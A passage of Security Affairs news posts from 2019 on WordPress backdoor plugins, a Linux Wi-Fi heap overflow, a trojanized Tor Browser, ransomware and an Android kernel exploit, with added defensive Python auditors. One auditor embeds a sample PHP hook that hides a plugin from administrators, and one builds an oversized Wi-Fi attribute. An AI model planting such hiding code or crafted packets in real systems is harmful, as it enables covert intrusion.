The use of 8-inch floppy disks was also confirmed by a report published by the US Government Accountability Office (GAO).

“Coordinates the operational functions of the United States’ nuclear forces, such as intercontinental ballistic missiles, nuclear bombers, and tanker support aircrafts. This system runs on an IBM Series/1 Computer—a 1970s computing system— and uses 8-inch floppy disks.” states the report.

“The agency plans to update its data storage solutions, port expansion processors, portable terminals, and desktop terminals by the end of fiscal year 2017.”

Robert Norman, a civilian Air Force employee working under Lt. Col. Rossi with more than four years of experience fixing the electronics on SACCS, explained that every fault on the ancient system requires dedicated maintenance, and that damaged components are often repaired by hand by specialists like him.

“Any electronic repair is going to take a lot of work. I shouldn’t say it’s difficult, [but] unfortunately a lot of the newer electronics are plug and play,” Norman told c4isrnet.com, explaining that when electronic components like motherboards or microchips break on newer systems, the common practice is to throw them out and replace them. “On SACCS, all of those pieces are repaired — which for maintainers could mean spending hours under a microscope, slowly but deliberately replacing a copper wire laced throughout a circuit board, for example. The challenges get a little larger when we’re actually repairing them down to component level,” he said.

Experts pointed out that even if the hardware used by SACCS is antiquated, its software is constantly refreshed by young Air Force programmers.

The problem of security for critical defense systems has been approached by the US Government several times. According to a report published by the Government Accountability Office (GAO) in October 2018, almost every new weapon system in the Pentagon’s arsenal is vulnerable to hacking.

According to the 50-page report published by the GAO, several vulnerabilities in the weapon systems were never fixed.

Pierluigi Paganini

(SecurityAffairs – SACCS, hacking)


Security Affairs 2019-10-19 23:46:08

Threat actors leverage malicious plugins that hide in plain sight to backdoor WordPress websites and to use them for brute-forcing other sites.

The use of fake WordPress plugins installed by hackers is not a novelty; recently, researchers at Sucuri observed multiple infections aimed at installing fake plugins with backdoor capabilities.

Attackers use automated tools to create malicious WordPress plugins and include malicious payloads, such as web shells, in their code.

The researchers spotted some fake plugins with backdoor functionality; two of them, named initiatorseo and updrat123, were based on the structure of the popular backup/restore WordPress plugin UpdraftPlus.

The UpdraftPlus WordPress plugin has more than 2 million active installations and its contributors regularly update it.

“While their code differs in terms of variable names, the malicious plugins do share a few things in common: they possess a similar structure along with header comments from the popular backup/restore plugin UpdraftPlus.” reads the post published by Sucuri.

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” the researchers at web security and protection company Sucuri found.

The malicious WordPress plugins are hidden from the WordPress dashboard and are visible only to users whose browsers send specific User-Agent strings, which vary from plugin to plugin.

The attacker could verify the presence of the malicious plugin using a GET request with custom parameters such as initiationactivity or testingkey.

The fake WordPress plugins allow attackers to establish a backdoor on the compromised sites, providing them with access to the servers even after the original infection vector has been removed.

The backdoors are used to upload arbitrary files to the compromised servers for malicious purposes, using POST requests.

“Malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.” continues the post.

“So far, the names of these POST parameters have been unique for each plugin that we’ve analyzed.”

The POST requests contain parameters such as the URL where the payloads to download are located, and the path where the files should be written on the compromised server.

Sucuri researchers also observed attackers using fake plugins to upload files with random names (e.g. 5d9196744f88d5d9196744f893.php) to site root directories. These files contain a script that threat actors use to carry out brute force attacks on other sites.

“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface.” concludes Sucuri.

“Additionally, compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.”
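One defensive check a site owner can run for the borrowed-header pattern described above, as an added example that is not Sucuri’s or WordPress’s code: it parses the standard plugin header comments under wp-content/plugins and flags directories whose header claims another plugin. The sample plugin directory is constructed inline, and treating a User-Agent-gated `all_plugins` filter as the hiding mechanism is an assumption, not something the post states.

```python
"""Audit a wp-content/plugins directory for plugins whose header metadata was
copied from another plugin, the pattern Sucuri describes for initiatorseo and
updrat123 (headers taken from UpdraftPlus 1.16.16).

Added example, not Sucuri's or UpdraftPlus's code. The sample site below is
constructed; treating a User-Agent-gated 'all_plugins' filter as a hiding
indicator is an assumption, not something the post states.
"""
import os
import re
import tempfile

# WordPress reads these fields from the comment block at the top of the main plugin file.
HEADER_RE = re.compile(
    r"^\s*\*?\s*(Plugin Name|Plugin URI|Version)\s*:\s*(.+?)\s*$", re.MULTILINE
)


def parse_plugin_header(php_source):
    """Return the header fields found in the first 8 KiB, the region WordPress inspects."""
    return dict(HEADER_RE.findall(php_source[:8192]))


def slug_matches_name(slug, plugin_name):
    """Heuristic: the first word of the header name normally appears in the directory slug."""
    token = re.sub(r"[^a-z0-9]", "", plugin_name.split()[0].lower())
    return bool(token) and token in slug.lower()


def scan_plugins_dir(plugins_dir):
    """Return (slug, indicator, detail) findings for every plugin directory."""
    records = []  # (slug, header dict, source) for the first file carrying a header
    for slug in sorted(os.listdir(plugins_dir)):
        pdir = os.path.join(plugins_dir, slug)
        if not os.path.isdir(pdir):
            continue
        for fname in sorted(f for f in os.listdir(pdir) if f.endswith(".php")):
            with open(os.path.join(pdir, fname), encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hdr = parse_plugin_header(src)
            if "Plugin Name" in hdr:
                records.append((slug, hdr, src))
                break

    findings = []
    mismatched = set()
    by_uri = {}
    for slug, hdr, src in records:
        if not slug_matches_name(slug, hdr["Plugin Name"]):
            mismatched.add(slug)
            findings.append((slug, "name-mismatch",
                             f"header claims '{hdr['Plugin Name']}' but lives in '{slug}/'"))
        if "Plugin URI" in hdr:
            by_uri.setdefault(hdr["Plugin URI"], []).append(slug)
        # Hiding the plugin from the list only for certain browsers needs both pieces (assumed).
        if "HTTP_USER_AGENT" in src and "all_plugins" in src:
            findings.append((slug, "ua-gated-hide",
                             "filters the plugin list based on the User-Agent header"))
    # Two directories claiming the same Plugin URI: blame the ones whose slug does not fit.
    for uri, slugs in by_uri.items():
        if len(slugs) < 2:
            continue
        suspects = [s for s in slugs if s in mismatched] or slugs
        for s in suspects:
            others = ", ".join(x for x in slugs if x != s)
            findings.append((s, "duplicate-header", f"Plugin URI {uri} also claimed by {others}"))
    return findings


UPDRAFT_HEADER = """<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Plugin URI: https://updraftplus.com
Version: 1.16.16
*/
"""

# Constructed fake plugin: borrowed header plus a User-Agent-gated hide (assumed mechanism).
FAKE_PLUGIN_BODY = UPDRAFT_HEADER + """
add_filter('all_plugins', function ($plugins) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'constructed-ua-token') === false) {
        unset($plugins['initiatorseo/initiatorseo.php']);
    }
    return $plugins;
});
"""


def build_constructed_sample():
    """Write a small constructed plugins directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    samples = {
        "akismet/akismet.php": "<?php\n/*\nPlugin Name: Akismet Anti-Spam\nPlugin URI: https://akismet.com/\nVersion: 0.0\n*/\n",
        "updraftplus/updraftplus.php": UPDRAFT_HEADER,
        "initiatorseo/initiatorseo.php": FAKE_PLUGIN_BODY,
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for slug, indicator, detail in scan_plugins_dir(build_constructed_sample()):
        print(f"{slug:14} {indicator:17} {detail}")
```

The slug heuristic produces review candidates rather than verdicts (some legitimate plugins live in directories that do not contain their name); the duplicate-header signal is the stronger one.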

Pierluigi Paganini

(SecurityAffairs – WordPress plugins, backdoor)


A critical Linux Wi-Fi bug could be exploited to fully compromise systems

A researcher discovered a critical Linux vulnerability, tracked as CVE-2019-17666, that could be exploited to fully compromise vulnerable machines.

Nico Waisman, principal security engineer at GitHub, discovered a critical Linux flaw, tracked as CVE-2019-17666, that could be exploited by attackers to fully compromise vulnerable machines.

The vulnerability affects Linux kernel versions through 5.3.6; according to the researcher, the issue has existed at least since 2015.

The vulnerability is a heap buffer overflow issue that resides in the “rtlwifi” driver, which allows certain Realtek Wi-Fi modules to communicate with the Linux operating system.

“rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.” reads the description published by NVD.

The issue affects a feature called the Notice of Absence protocol implemented in the “rtlwifi” driver. The protocol is used by devices to autonomously power down their radio and save energy.

“The Notice of Absence (NoA) protocol allows a P2P GO to announce time intervals, referred to as absence periods, where P2P Clients are not allowed to access the channel, regardless of whether they are in power save or in active mode. In this way, a P2P GO can autonomously decide to power down its radio to save energy.” reads a paper on Device to device communications.

The expert noticed that the driver fails to correctly handle Notice of Absence packets.

“Nicolas Waisman noticed that even though noa_len is checked for a compatible length it’s still possible to overrun the buffers of p2pinfo since there’s no check on the upper bound of noa_num. Bound noa_num against P2P_MAX_NOA_NUM.” reads the security advisory.

An attacker could use packets with incorrect length to trigger the flaw and cause the system to crash.

An unauthenticated attacker could trigger the flaw only when within radio range of the target device.

“The vulnerability triggers an overflow, which means it could make Linux crash or if a proper exploit is written (which is not trivial), an attacker could obtain remote code-execution,” Waisman explained to Threatpost.

The Linux kernel team has already developed a fix that is currently under review; it has not yet been merged into the Linux kernel.
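A userland re-implementation of the two checks the advisory describes, as an added example in plain Python that is not the rtlwifi driver’s code: the length must cover whole 13-byte descriptors (the check the driver already had) and the derived descriptor count must be bounded by the driver’s array size (the missing one). The attribute layout follows the Wi-Fi P2P Notice of Absence format, and P2P_MAX_NOA_NUM = 2 is assumed here.

```python
"""Parse a P2P Notice of Absence (NoA) attribute with the two checks the
CVE-2019-17666 advisory talks about: the length must be compatible with whole
13-byte descriptors (the check the driver already had), and the derived
descriptor count must be bounded by the driver's array size (the missing one).

Added example in plain Python, not the rtlwifi driver's code: the driver copies
each descriptor into fixed-size arrays of P2P_MAX_NOA_NUM entries, which is
where an unbounded count overruns the heap. P2P_MAX_NOA_NUM = 2 is assumed here.
"""
import struct
from dataclasses import dataclass

NOA_ATTR_ID = 12          # Notice of Absence attribute ID in the P2P IE (Wi-Fi P2P spec)
NOA_DESC_LEN = 13         # count/type (1) + duration (4) + interval (4) + start time (4)
P2P_MAX_NOA_NUM = 2       # assumed size of the driver's per-field NoA arrays


class NoAError(ValueError):
    """Raised for attributes a careful parser must refuse."""


@dataclass
class NoADescriptor:
    count_type: int
    duration: int
    interval: int
    start_time: int


def parse_noa_attribute(attr, bound_count=True):
    """Return (index, ctwindow_oppps, descriptors) for one NoA attribute.

    attr layout: ID (1) | length, little-endian (2) | index (1) | CTWindow/OppPS (1)
                 | noa_num descriptors of NOA_DESC_LEN bytes each.
    With bound_count=False the count is derived from the length alone, which is the
    behaviour the advisory describes; here a list just grows, in the driver the
    fixed arrays overflow.
    """
    if len(attr) < 5 or attr[0] != NOA_ATTR_ID:
        raise NoAError("not a NoA attribute")
    noa_len = struct.unpack_from("<H", attr, 1)[0]
    if noa_len < 2 or len(attr) < 3 + noa_len:
        raise NoAError("declared length exceeds the buffer")
    if (noa_len - 2) % NOA_DESC_LEN != 0:
        raise NoAError("length is not a whole number of descriptors")  # existing check
    noa_num = (noa_len - 2) // NOA_DESC_LEN
    if bound_count and noa_num > P2P_MAX_NOA_NUM:
        raise NoAError(f"noa_num={noa_num} exceeds P2P_MAX_NOA_NUM")   # the missing upper bound
    index, ctwindow = attr[3], attr[4]
    descriptors = []
    offset = 5
    for _ in range(noa_num):
        count_type, duration, interval, start = struct.unpack_from("<BIII", attr, offset)
        descriptors.append(NoADescriptor(count_type, duration, interval, start))
        offset += NOA_DESC_LEN
    return index, ctwindow, descriptors


def build_noa_attribute(index, ctwindow, descriptors):
    """Encode an attribute (used to construct test input; a peer controls these bytes)."""
    body = bytes([index, ctwindow])
    for d in descriptors:
        body += struct.pack("<BIII", d.count_type, d.duration, d.interval, d.start_time)
    return bytes([NOA_ATTR_ID]) + struct.pack("<H", len(body)) + body


def descriptor_count(attr, bound_count=True):
    """How many descriptors the parser would hand to the driver's fixed arrays."""
    return len(parse_noa_attribute(attr, bound_count)[2])


if __name__ == "__main__":
    good = build_noa_attribute(1, 0x80, [NoADescriptor(255, 1000, 2000, 0)] * 2)
    print("two descriptors:", descriptor_count(good))
    crafted = build_noa_attribute(1, 0x80, [NoADescriptor(255, 1000, 2000, 0)] * 3)
    try:
        parse_noa_attribute(crafted)
    except NoAError as err:
        print("bounded parser refused:", err)
    print("unbounded parser would hand over", descriptor_count(crafted, bound_count=False))
```

Whether a parser rejects or clamps an oversized count is a design choice; either keeps the per-descriptor arrays in bounds.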

Pierluigi Paganini

(SecurityAffairs – Linux Kernel, hacking)

The post A critical Linux Wi-Fi bug could be exploited to fully compromise systems appeared first on Security Affairs.

Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Over 600 million UC Browser and UC Browser Mini Android users have been exposed to man-in-the-middle (MiTM) attacks.

More than 600 million users of the popular UC Browser and UC Browser Mini Android apps have been exposed to man-in-the-middle (MiTM) attacks because the apps download an Android Package Kit (APK) from a third-party server over an unprotected channel.

The UC Browser is developed by UCWeb, a company owned by the Alibaba Group since 2014, and is the world’s fourth most popular mobile browser according to StatCounter.

Researchers at Zscaler were investigating unusual activity when they discovered questionable connections to a specific domain, 9appsdownloading[.]com. The requests were being made by the UC Browser app.

Further investigation allowed the researchers to determine that the UC Browser app was attempting to download an additional Android Package Kit (APK) over an unsecured channel (HTTP instead of HTTPS). This practice violates the Google Play policy, and the use of an unsecured channel exposes users to man-in-the-middle attacks, which could allow attackers to deliver and install an arbitrary payload on a target device to perform a broad range of malicious activities.

The analysis of the APK revealed that it was available on a third-party app store named 9Apps, with the com.mobile.indiapp package name.

Once installed on a device, the 9Apps app started scanning for installed applications and it allowed installing more apps from the third-party app store that were downloaded as APKs from the 9appsdownloading[.]com domain.


Researchers also pointed out that dropping an APK on external storage (/storage/emulated/0) could allow other apps, with appropriate permissions, to tamper with the APK.

Zscaler shared its findings with Google on August 13, and the discussion on the potential violation lasted until September 25.

On September 27 Google acknowledged the problems and reported them to UCWeb, asking the development team to “update the apps and remediate the policy violation.” UCWeb addressed the issues in its apps.

“It is too early to determine exactly what the Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.” concludes the analysis published by Zscaler.

“Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications.”

In May, security researcher Arif Khan discovered a browser address bar spoofing flaw in the popular browser apps for Android.

Pierluigi Paganini

(SecurityAffairs – Android, hacking)

The post Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again. appeared first on Security Affairs.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft has released a new free decryption tool for the STOP (Djvu) ransomware; in recent months its research team has helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that have infected hundreds of thousands of victims worldwide. Experts estimate a total of 460,000 victims, which makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Djvu ransomware encrypts victims’ files with Salsa20 and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980; victims receive a 50% discount if they contact the crooks within the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks; experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover, for free, files encrypted by 148 of the 160 variants, which means that approximately 70% of victims will be able to recover their data. Unfortunately, it is currently not possible to decrypt files encrypted by the remaining 12 variants.

Below are the key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Systems at Ingredients provider Ingredion infected with a Malware

The US ingredient provider Ingredion Incorporated announced that it has recently detected suspicious activity associated with a malware attack.

The US ingredient provider Ingredion Incorporated revealed that it detected an ongoing malware attack after its experts noticed suspicious activity this week. Ingredion has hired third-party experts to help its staff investigate the incident and restore the affected systems.

At the time of writing, the company had not provided details about the attack; Ingredion only said that there is no evidence that hackers accessed customer, supplier or employee data.

“The company warns that it has called in external experts to assist with restoring affected servers, and there may be some delays in transactions with customers and suppliers.” reported SecurityWeek.

“The ingredient solutions provider admitted that it “will take time” to restore some of the impacted systems.”


Experts believe that the company was infected with a piece of ransomware.

Recently the global shipping and mailing services company Pitney Bowes suffered a security incident, today the company published an update on the attack and confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

Pierluigi Paganini

(SecurityAffairs – Ingredion, malware)

The post Systems at Ingredients provider Ingredion infected with a Malware appeared first on Security Affairs.

Trojanized Tor Browser targets shoppers of Darknet black marketplaces

A tainted version of the Tor Browser is targeting dark web market shoppers to steal their cryptocurrency and gather information on their browsing activity.

A Trojanized version of the Tor Browser is targeting shoppers of black marketplaces in the dark web, threat actors aim to steal their cryptocurrency and gather information on their browsing activity.

At the time of writing, attackers have already stolen about $40,000 worth of Bitcoin through more than 860 transactions registered to three of the attackers’ wallets.

“Utilizing a trojanized version of an official Tor Browser package, the cybercriminals behind this campaign have been very successful – so far their pastebin.com accounts have had more than 500,000 views and they were able to steal US$40,000+ in bitcoins.” reads a post published by ESET.

The weaponized version of the Tor Browser is promoted on Pastebin as the Russian version of the popular software. The Pastebin posts advertise the version by claiming that it also includes an anti-captcha feature that allows users to speed up their browsing.

The trojanized Tor browser variant is hosted on the following two domains created in 2014 that are designed to appear as the official Russian version of the software:

  • tor-browser[.]org
  • torproect[.]org (the URL is missing “j”)

Threat actors also optimized the posts promoting the malicious software to appear as top results for queries for drugs, censorship bypass, and Russian politicians.

Between 2017 and early 2018, crooks promoted the webpages of the trojanized Tor Browser using spam messages on multiple Russian forums.

The home page of both sites displays a warning informing visitors that they have an outdated Tor Browser, even when they are using the most up-to-date Tor Browser version.


“Your anonymity is in danger! WARNING: Your Tor Browser is outdated. Click the button “Update”,” reads the English translation.

When the users click on the “Update Tor Browser” button, they are redirected to a second website that delivers a Windows installer.

“This trojanized Tor Browser is a fully functional application. In fact, it is based on Tor Browser 7.5, which was released in January 2018. Thus, non-technically-savvy people probably won’t notice any difference between the original version and the trojanized one.” continues the analysis.

“No changes were made to source code of the Tor Browser; all Windows binaries are exactly the same as in the original version. However, these criminals changed the default browser settings and some of the extensions.”

The Trojanized Tor Browser has the update feature disabled to prevent victims from updating to a non-tainted version; the attackers also changed the default User-Agent to a unique hardcoded value that they use as a fingerprint.

“The most important change is to the xpinstall.signatures.required settings, which disable a digital signature check for installed Tor Browser add-ons.” reads the post. “Therefore, the attackers can modify any add-on and it will be loaded by the browser without any complaint about it failing its digital signature check.”

Crooks also modified the HTTPS Everywhere add-on included with the browser to add a content script (script.js) that will be executed on load in the context of every webpage.

The JavaScript payload uses a standard webinject mechanism that allows stealing content in forms, hiding original content, showing fake messages, or adding its own content.

The only JavaScript payload observed by ESET was used to target visitors of three of the largest Russian-speaking darknet markets. This script attempts to alter QIWI (a popular Russian money transfer service) or bitcoin wallets located on pages of these markets.

Using this trick, attackers are able to hijack payments by replacing the shoppers’ wallet addresses with ones belonging to the attackers.

“As of this writing, the total amount of received funds for all three wallets is 4.8 bitcoin, which corresponds to over US$40,000. It should be noted that the real amount of stolen money is higher because the trojanized Tor Browser also alters QIWI wallets.” concludes ESET that also shared IoCs. “This trojanized Tor Browser is a non-typical form of malware, designed to steal digital currency from visitors to darknet markets. Criminals didn’t modify binary components of the Tor Browser; instead, they introduced changes to settings and the HTTPS Everywhere extension. This has allowed them to steal digital money, unnoticed, for years.”
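A profile audit for the settings changes described above, as an added example that is not ESET’s or the Tor Project’s code: it parses a Firefox-style prefs.js/user.js and flags signature checking switched off, updates disabled and a User-Agent override that differs from the expected value. Only xpinstall.signatures.required is named in the post; app.update.enabled, app.update.auto and general.useragent.override are standard Firefox pref names assumed here to be the mechanism, and the sample prefs are constructed.

```python
"""Audit a Tor Browser profile's prefs.js/user.js for the settings changes ESET
describes: add-on signature checks switched off, updates disabled and a
hard-coded User-Agent override.

Added example, not ESET's or the Tor Project's code. Only
xpinstall.signatures.required is named in the post; app.update.enabled,
app.update.auto and general.useragent.override are standard Firefox pref names
assumed here to be the mechanism, and the sample prefs below are constructed.
"""
import re

# user_pref("name", value);  or  pref("name", value);
PREF_RE = re.compile(r'^\s*(?:user_pref|pref)\(\s*"([^"]+)"\s*,\s*(.+?)\s*\);\s*$')


def parse_pref_value(raw):
    """Convert the literal from a pref line into bool, int or str."""
    if raw == "true":
        return True
    if raw == "false":
        return False
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1]
    try:
        return int(raw)
    except ValueError:
        return raw


def parse_prefs(text):
    """Return {pref name: value} for every user_pref()/pref() line in a prefs file."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = parse_pref_value(m.group(2))
    return prefs


def audit_prefs(prefs, expected_user_agent=None):
    """Return (pref, value, reason) for each setting matching the trojanized profile."""
    findings = []
    if prefs.get("xpinstall.signatures.required") is False:
        findings.append(("xpinstall.signatures.required", False,
                         "add-on signature check disabled: modified add-ons load silently"))
    for pref in ("app.update.enabled", "app.update.auto"):   # assumed update-control prefs
        if prefs.get(pref) is False:
            findings.append((pref, False, "browser updates disabled"))
    ua = prefs.get("general.useragent.override")
    if isinstance(ua, str) and expected_user_agent is not None and ua != expected_user_agent:
        findings.append(("general.useragent.override", ua,
                         "User-Agent differs from the expected value: possible fingerprint"))
    return findings


# Constructed sample: what a tampered profile might contain, plus two harmless prefs.
SAMPLE_PREFS = """\
user_pref("browser.download.dir", "/tmp/constructed");
user_pref("xpinstall.signatures.required", false);
user_pref("app.update.enabled", false);
user_pref("general.useragent.override", "Mozilla/5.0 (constructed-fingerprint-value)");
user_pref("privacy.resistFingerprinting", true);
"""
EXPECTED_UA = "Mozilla/5.0 (constructed expected user agent)"   # assumed deployment value

if __name__ == "__main__":
    for pref, value, reason in audit_prefs(parse_prefs(SAMPLE_PREFS), EXPECTED_UA):
        print(f"{pref}: {value!r} -> {reason}")
```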

Pierluigi Paganini

(SecurityAffairs – Trojanized Tor Browser, hacking)

The post Trojanized Tor Browser targets shoppers of Darknet black marketplaces appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company has now published an update on the attack, confirming that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack; the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that it has now restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September, the city of New Bedford was infected with Ryuk ransomware but did not pay the $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, and in early March Jackson County, Georgia, was hit by the same ransomware, which paralyzed government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw

A researcher has published proof-of-concept (PoC) exploit code for the CVE-2019-2215 zero-day flaw in Android recently addressed by Google.

Earlier in October, Google Project Zero researcher Maddie Stone publicly disclosed a zero-day vulnerability, tracked as CVE-2019-2215, in Android.

According to the expert, the bug was allegedly being used or sold by the controversial surveillance firm NSO Group.

Maddie Stone published technical details and a proof-of-concept exploit for the high-severity security vulnerability seven days after she reported it to her colleagues on the Android security team.

The flaw is a use-after-free vulnerability that affects the Android kernel’s binder driver; it could be exploited by a local privileged attacker or a malicious app to escalate privileges and gain root access to a vulnerable device. Experts warn it could potentially allow an attacker to fully compromise the device.

The flaw affects versions of the Android kernel released before April last year. This vulnerability was addressed in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4]. The expert pointed out that the Pixel 2 with the most recent security bulletin is still vulnerable based on source code review.

This means that most of the Android devices available on the market with the unpatched kernel are still vulnerable, even if the owners have installed the latest Android security updates.

Some of the devices which appear to be vulnerable based on source code review are:

1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
2) Huawei P20
3) Xiaomi Redmi 5A
4) Xiaomi Redmi Note 5
5) Xiaomi A1
6) A3
7) Moto Z3
8) Oreo LG phones (run according to )
9) Samsung S7, S8, S9

Maddie Stone explained that the flaw is accessible from inside the Chrome sandbox; the issue is exploitable in Chrome’s renderer processes under Android’s ‘isolated_app’ SELinux domain. This means that a remote attacker could potentially exploit the flaw by chaining it with a Chrome rendering issue.

Last week, Google released security patches for Android, the tech giant announced that patches to address the CVE-2019-2215 in Pixel 1 and Pixel 2 devices will be included in the October update.

Now the researcher Grant Hernandez, a PhD candidate at the Florida Institute of Cyber Security at the University of Florida, has publicly disclosed PoC exploit code for the CVE-2019-2215 vulnerability.

“All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept. I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.” reads a blog post published by Hernandez.

“The base PoC left us with a full kernel read/write primitive, essentially game over for the systems’ security, but left achieving root as an exercise for the reader.”

The expert explained that an attacker who aims to get a full root shell would need to bypass multiple layers of security defense implemented by Google, including Discretionary Access Control (DAC), Mandatory Access Control (MAC), Linux Capabilities (CAP), SECCOMP, and the Android Middleware.

Hernandez pointed out that an app-accessible kernel exploit allows the attacker to easily bypass or disable all of these layers of defense.

The expert detailed how to bypass DAC and CAP and how to disable SELinux and SECCOMP. The expert created a one-click rooting application called Qu1ckR00t.

“Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.” concludes the researcher, who published the PoC exploit code on GitHub. “There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2215, zero-day)

The post Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw appeared first on Security Affairs.

Cryptocurrency miners infected more than 50% of the European airport workstations

Researchers at Cyberbit spotted a crypto mining campaign that infected more than 50% of the European airport workstations. 

Security experts at Cyberbit have uncovered a crypto mining campaign that infected more than 50% of the European airport workstations. 

European airport systems were infected with a Monero cryptocurrency miner that was linked to the Anti-CoinMiner campaign discovered this summer by Zscaler researchers.  

“While rolling out Cyberbit’s Endpoint Detection and Response (EDR) in an international airport in Europe, our researchers identified an interesting crypto mining infection, where cryptocurrency mining software was installed on more than 50% of the airport’s workstations.” reads the analysis published by Cyberbit.

Experts pointed out that the Monero miners were installed on the European airport systems even though they were running an industry-standard antivirus. Threat actors were able to package the miner so that it evaded detection by ordinary antivirus products.

“The malware we found was first discovered by Zscaler more than a year ago,” continues Cyberbit. “It was modified just enough to evade the vast majority of existing signatures for it, with only 16 out of 73 detection products on VirusTotal detecting the sample as malicious.”

The good news is that the miner did not impact the airport’s operations.

Cyberbit’s behavioral engine detected suspicious usage of the PAExec tool, which was used to execute an application named player.exe.

PAExec is a redistributable version of the legitimate Microsoft PsExec tool, which is used to run Windows programs on remote systems without having to physically install software on them. The execution of the PAExec tool is often associated with an ongoing attack; in this case, hackers used it to launch the Player executable “in system mode.”

Experts also observed the use of Reflective DLL Loading after running player.exe. The technique allows the attackers to remotely inject a DLL directly into a process in memory.

“This impacts the performance of other applications, as well as that of the airport facility. The use of administrative privileges also reduces the ability for security tools to detect the activity.” continues the report.

In order to gain persistence, attackers added an entry for PAExec in the systems’ registries.

At the time, researchers were not able to determine how attackers infected the European Airport systems.

“Because the malware happened to be a cryptominer, its business impact was relatively minor, limited to performance degradations leading to quality of service and service interruptions, as well as a significant increase in power consumption throughout the airport.” concludes Cyberbit.

